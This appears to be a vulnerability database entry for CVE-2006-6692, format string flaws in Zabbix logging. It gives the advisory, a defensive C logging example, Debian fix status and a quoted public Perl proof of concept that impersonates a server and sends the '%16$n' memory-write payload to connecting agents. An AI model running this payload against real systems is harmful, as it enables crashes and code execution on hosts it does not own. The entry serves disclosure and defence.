CVE-2006-6692

VIR risk: 1.0

Description

Multiple format string vulnerabilities in zabbix before 20061006 allow attackers to cause a denial of service (application crash) and possibly execute arbitrary code via format string specifiers in information that would be recorded in the system log using (1) zabbix_log or (2) zabbix_syslog.
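
The bug class described above, shown from the defender's side as an added example (not Zabbix source code and not part of the original advisory): a logging wrapper that takes a format string is only safe when peer-controlled text is passed as an argument to a constant format. The names demo_log, log_peer_data and has_format_directive are hypothetical, and the sample input is constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical logging wrapper (assumption, not Zabbix code). The format
 * attribute lets GCC/Clang run -Wformat -Wformat-security on every call site. */
static int demo_log(char *out, size_t outlen, const char *fmt, ...)
    __attribute__((format(printf, 3, 4)));

static int demo_log(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, outlen, fmt, ap); /* bounded, NUL-terminated write */
    va_end(ap);
    return n; /* length the full message needs, as vsnprintf reports it */
}

/* Unsafe pattern, shown only as a comment and never executed:
 *     demo_log(out, outlen, peer_data);
 * Here peer_data is the format string, so its % directives are interpreted. */

/* Hardened pattern: constant format, peer-controlled text as an argument. */
int log_peer_data(char *out, size_t outlen, const char *peer_data)
{
    return demo_log(out, outlen, "peer sent: %s", peer_data);
}

/* Audit helper: 1 if the text holds a '%' that is not the "%%" escape. */
int has_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        return 1;
    }
    return 0;
}

int main(void)
{
    char line[128];
    const char *sample = "key %x %s %n"; /* constructed sample input */
    log_peer_data(line, sizeof line, sample);
    printf("%s (directive present: %d)\n", line, has_format_directive(sample));
    return 0;
}
```

Building with -Wformat -Wformat-security makes the compiler flag call sites that pass a non-literal string as the format with no arguments.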

Predictions

Exploit likelihood: 20%
Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-28775 dos linux verified text · 1 KB
Max Vozeler · 2006-10-09

Zabbix 1.1.2 - Multiple Remote Code Execution Vulnerabilities

source: https://www.securityfocus.com/bid/20416/info

ZABBIX is prone to multiple unspecified remote code-execution vulnerabilities. 

Reports indicate that these issues facilitate format-string and buffer-overflow attacks. A remote attacker may leverage these vulnerabilities to trigger denial-of-service conditions or to execute arbitrary code to gain unauthorized access to a vulnerable computer. This would occur in the context of the application.

ZABBIX version 1.1.2 is reported vulnerable; other versions may be affected as well.

#!/usr/bin/perl --

# zabbix-exploiter
# by Ulf Harnhammar in 2006
# I hereby place this program in the public domain.

use IO::Socket;
$server = IO::Socket::INET->new( Proto     => 'tcp',
                                 LocalPort => 10050,
                                 Listen    => SOMAXCONN,
                                 Reuse     => 1);
die "can't create server\n" if !$server;

while ($client = $server->accept())
{
  $client->autoflush(1);
  $key = <$client>; print $key;
  print $client 'UUUU%16$n'; # writes data to 0x55555555, at least on Debian testing
  # print $client '%n%n%n%n'; # crashes
  close $client;
}

OS impact

Debian: fixed in 5 releases

Version    Status   Fixed in
trixie     Fixed    1:1.1.2-4
sid        Fixed    1:1.1.2-4
forky      Fixed    1:1.1.2-4
bullseye   Fixed    1:1.1.2-4
bookworm   Fixed    1:1.1.2-4
